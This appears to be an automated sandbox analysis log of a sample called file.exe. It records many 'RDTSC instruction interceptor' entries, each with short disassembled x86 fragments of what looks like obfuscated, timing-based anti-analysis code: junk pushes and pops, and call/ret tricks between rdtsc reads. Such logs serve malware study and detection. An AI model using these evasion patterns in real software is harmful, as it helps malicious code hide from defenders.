Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55A63E second address: 55A693 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007F40B477E788h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 00000018h 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 mov ecx, dword ptr [ebp+122D37EDh] 0x0000002a push 00000000h 0x0000002c sub dword ptr [ebp+122D3433h], esi 0x00000032 jne 00007F40B477E78Ah 0x00000038 call 00007F40B477E789h 0x0000003d jnp 00007F40B477E794h 0x00000043 push eax 0x00000044 push edx 0x00000045 pushad 0x00000046 popad 0x00000047 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55A693 second address: 55A6A2 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F40B515FBF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push esi 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55A6A2 second address: 55A6B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop esi 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push eax 0x0000000b push edx 0x0000000c ja 00007F40B477E788h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55A6B6 second address: 55A6EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F40B515FBF6h 0x00000009 jmp 00007F40B515FC01h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov eax, dword ptr [eax] 0x00000013 push edx 0x00000014 jng 00007F40B515FBFCh 0x0000001a pop edx 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f push eax 0x00000020 push edx 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55A6EC second address: 55A6F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55A6F1 second address: 55A799 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F40B515FC0Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b movsx esi, si 0x0000000e movzx edx, di 0x00000011 push 00000003h 0x00000013 push 00000000h 0x00000015 push edi 0x00000016 call 00007F40B515FBF8h 0x0000001b pop edi 0x0000001c mov dword ptr [esp+04h], edi 0x00000020 add dword ptr [esp+04h], 0000001Bh 0x00000028 inc edi 0x00000029 push edi 0x0000002a ret 0x0000002b pop edi 0x0000002c ret 0x0000002d sub dword ptr [ebp+122D1DF0h], esi 0x00000033 jmp 00007F40B515FC07h 0x00000038 push 00000000h 0x0000003a mov dword ptr [ebp+122D3515h], edi 0x00000040 push 00000003h 0x00000042 pushad 0x00000043 call 00007F40B515FC04h 0x00000048 mov edx, 6CA795B0h 0x0000004d pop ecx 0x0000004e xor dword ptr [ebp+122D1DF9h], ebx 0x00000054 popad 0x00000055 call 00007F40B515FBF9h 0x0000005a pushad 0x0000005b pushad 0x0000005c jl 00007F40B515FBF6h 0x00000062 push eax 0x00000063 push edx 0x00000064 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55A799 second address: 55A7C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push edi 0x00000009 pop edi 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d jmp 00007F40B477E791h 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 push eax 0x00000017 push edx 0x00000018 push esi 0x00000019 push ebx 0x0000001a pop ebx 0x0000001b pop esi 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55A7C1 second address: 55A86D instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F40B515FBF8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e pushad 0x0000000f pushad 0x00000010 jmp 00007F40B515FC00h 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 jmp 00007F40B515FC08h 0x0000001d popad 0x0000001e mov dword ptr [esp+04h], eax 0x00000022 js 00007F40B515FC06h 0x00000028 je 00007F40B515FC00h 0x0000002e jmp 00007F40B515FBFAh 0x00000033 pop eax 0x00000034 mov dl, cl 0x00000036 lea ebx, dword ptr [ebp+1244F1C7h] 0x0000003c push 00000000h 0x0000003e push ebp 0x0000003f call 00007F40B515FBF8h 0x00000044 pop ebp 0x00000045 mov dword ptr [esp+04h], ebp 0x00000049 add dword ptr [esp+04h], 0000001Ch 0x00000051 inc ebp 0x00000052 push ebp 0x00000053 ret 0x00000054 pop ebp 0x00000055 ret 0x00000056 jmp 00007F40B515FC04h 0x0000005b xchg eax, ebx 0x0000005c push eax 0x0000005d push edx 0x0000005e jmp 00007F40B515FC02h 0x00000063 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 55256B second address: 55256F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 577ECA second address: 577ECE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 57870A second address: 578710 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 57887F second address: 57889F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F40B515FBFAh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F40B515FBFDh 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 578A06 second address: 578A0F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 578A0F second address: 578A17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 578CDD second address: 578CE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 579A3E second address: 579A4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jp 00007F40B515FBFCh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 579BA3 second address: 579BAF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jnl 00007F40B477E786h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 579BAF second address: 579BE8 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F40B515FBFCh 0x00000008 jns 00007F40B515FBF6h 0x0000000e je 00007F40B515FC13h 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 579BE8 second address: 579BEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 579BEE second address: 579BFE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B515FBFCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 57E4FC second address: 57E514 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F40B477E794h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 57EC08 second address: 57EC0D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 57FE1D second address: 57FE23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 57FE23 second address: 57FE27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 57FE27 second address: 57FE41 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F40B477E786h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 jng 00007F40B477E794h 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 57FE41 second address: 57FE45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 57FFA8 second address: 57FFE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F40B477E786h 0x0000000a popad 0x0000000b jmp 00007F40B477E797h 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jnc 00007F40B477E796h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 549FDE second address: 549FFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F40B515FC05h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 549FFB second address: 54A002 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54A002 second address: 54A008 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54A008 second address: 54A016 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007F40B477E786h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54A016 second address: 54A023 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54A023 second address: 54A02D instructions: 0x00000000 rdtsc 0x00000002 jl 00007F40B477E786h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5862C0 second address: 5862DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F40B515FC09h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 585873 second address: 5858A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jp 00007F40B477E786h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f jno 00007F40B477E78Eh 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 push esi 0x0000001a pop esi 0x0000001b jl 00007F40B477E786h 0x00000021 push edi 0x00000022 pop edi 0x00000023 jne 00007F40B477E786h 0x00000029 popad 0x0000002a push edi 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5858A8 second address: 5858AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5858AF second address: 5858BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F40B477E786h 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5858BB second address: 5858BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 585E42 second address: 585E46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 585E46 second address: 585E67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F40B515FC07h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 585E67 second address: 585E6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 585E6D second address: 585E71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 585E71 second address: 585E89 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F40B477E792h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 585E89 second address: 585E8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 587181 second address: 587185 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 587211 second address: 587240 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F40B515FBFCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jmp 00007F40B515FBFCh 0x00000013 mov eax, dword ptr [eax] 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F40B515FBFBh 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 587240 second address: 587284 instructions: 0x00000000 rdtsc 0x00000002 js 00007F40B477E799h 0x00000008 jmp 00007F40B477E793h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 push edi 0x00000014 jmp 00007F40B477E795h 0x00000019 pop edi 0x0000001a pop eax 0x0000001b stc 0x0000001c push D6585ED1h 0x00000021 push ebx 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 587284 second address: 587288 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 587383 second address: 587387 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 587387 second address: 5873AD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007F40B515FC0Ah 0x0000000c popad 0x0000000d push eax 0x0000000e push ebx 0x0000000f push ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 587E43 second address: 587E64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 je 00007F40B477E78Ch 0x0000000b jbe 00007F40B477E786h 0x00000011 popad 0x00000012 push eax 0x00000013 jbe 00007F40B477E7A3h 0x00000019 push eax 0x0000001a push edx 0x0000001b jbe 00007F40B477E786h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 587FB4 second address: 587FD3 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F40B515FC05h 0x00000008 jmp 00007F40B515FBFFh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 587FD3 second address: 587FD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 587FD7 second address: 587FDB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 58B8C1 second address: 58B8C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 58C06C second address: 58C072 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 58E70B second address: 58E733 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F40B477E798h 0x00000009 popad 0x0000000a jmp 00007F40B477E78Bh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 58E733 second address: 58E738 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54D4C3 second address: 54D4D0 instructions: 0x00000000 rdtsc 0x00000002 je 00007F40B477E786h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 58ED8C second address: 58ED94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 58ED94 second address: 58ED98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 58ED98 second address: 58ED9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 594644 second address: 59464E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5937F2 second address: 5937F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 59464E second address: 594652 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5937F6 second address: 5937FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 594652 second address: 59469E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 or bx, 93E1h 0x0000000d push 00000000h 0x0000000f jmp 00007F40B477E790h 0x00000014 cmc 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push eax 0x0000001a call 00007F40B477E788h 0x0000001f pop eax 0x00000020 mov dword ptr [esp+04h], eax 0x00000024 add dword ptr [esp+04h], 00000019h 0x0000002c inc eax 0x0000002d push eax 0x0000002e ret 0x0000002f pop eax 0x00000030 ret 0x00000031 mov bh, dh 0x00000033 xchg eax, esi 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 pop eax 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 59469E second address: 5946A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5946A2 second address: 5946A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 59560C second address: 59566D instructions: 0x00000000 rdtsc 0x00000002 jns 00007F40B515FBF8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push esi 0x00000010 call 00007F40B515FBF8h 0x00000015 pop esi 0x00000016 mov dword ptr [esp+04h], esi 0x0000001a add dword ptr [esp+04h], 00000019h 0x00000022 inc esi 0x00000023 push esi 0x00000024 ret 0x00000025 pop esi 0x00000026 ret 0x00000027 mov di, cx 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push edi 0x0000002f call 00007F40B515FBF8h 0x00000034 pop edi 0x00000035 mov dword ptr [esp+04h], edi 0x00000039 add dword ptr [esp+04h], 00000016h 0x00000041 inc edi 0x00000042 push edi 0x00000043 ret 0x00000044 pop edi 0x00000045 ret 0x00000046 push 00000000h 0x00000048 and bx, 9B11h 0x0000004d push eax 0x0000004e push eax 0x0000004f push edx 0x00000050 push eax 0x00000051 push edx 0x00000052 push eax 0x00000053 push edx 0x00000054 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 594898 second address: 5948B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B477E790h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jng 00007F40B477E790h 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 59566D second address: 595671 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 595671 second address: 595677 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 59652C second address: 596593 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edi 0x00000006 pop edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ebp 0x00000010 call 00007F40B515FBF8h 0x00000015 pop ebp 0x00000016 mov dword ptr [esp+04h], ebp 0x0000001a add dword ptr [esp+04h], 00000017h 0x00000022 inc ebp 0x00000023 push ebp 0x00000024 ret 0x00000025 pop ebp 0x00000026 ret 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push edi 0x0000002c call 00007F40B515FBF8h 0x00000031 pop edi 0x00000032 mov dword ptr [esp+04h], edi 0x00000036 add dword ptr [esp+04h], 00000014h 0x0000003e inc edi 0x0000003f push edi 0x00000040 ret 0x00000041 pop edi 0x00000042 ret 0x00000043 push 00000000h 0x00000045 mov di, 3F3Bh 0x00000049 xchg eax, esi 0x0000004a jnp 00007F40B515FC00h 0x00000050 pushad 0x00000051 jnp 00007F40B515FBF6h 0x00000057 push edi 0x00000058 pop edi 0x00000059 popad 0x0000005a push eax 0x0000005b push esi 0x0000005c push eax 0x0000005d push edx 0x0000005e pushad 0x0000005f popad 0x00000060 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 59580C second address: 595812 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 59851B second address: 598536 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B515FC07h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5975E5 second address: 5975E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 598536 second address: 59853D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5975E9 second address: 5975EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 59872C second address: 598732 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 59B54A second address: 59B54F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 59A835 second address: 59A839 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 59B54F second address: 59B554 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 59A839 second address: 59A843 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 59B554 second address: 59B55A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 59A843 second address: 59A86A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F40B515FC00h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c push ecx 0x0000000d jo 00007F40B515FBF6h 0x00000013 pop ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 jl 00007F40B515FBF6h 0x0000001c rdtsc
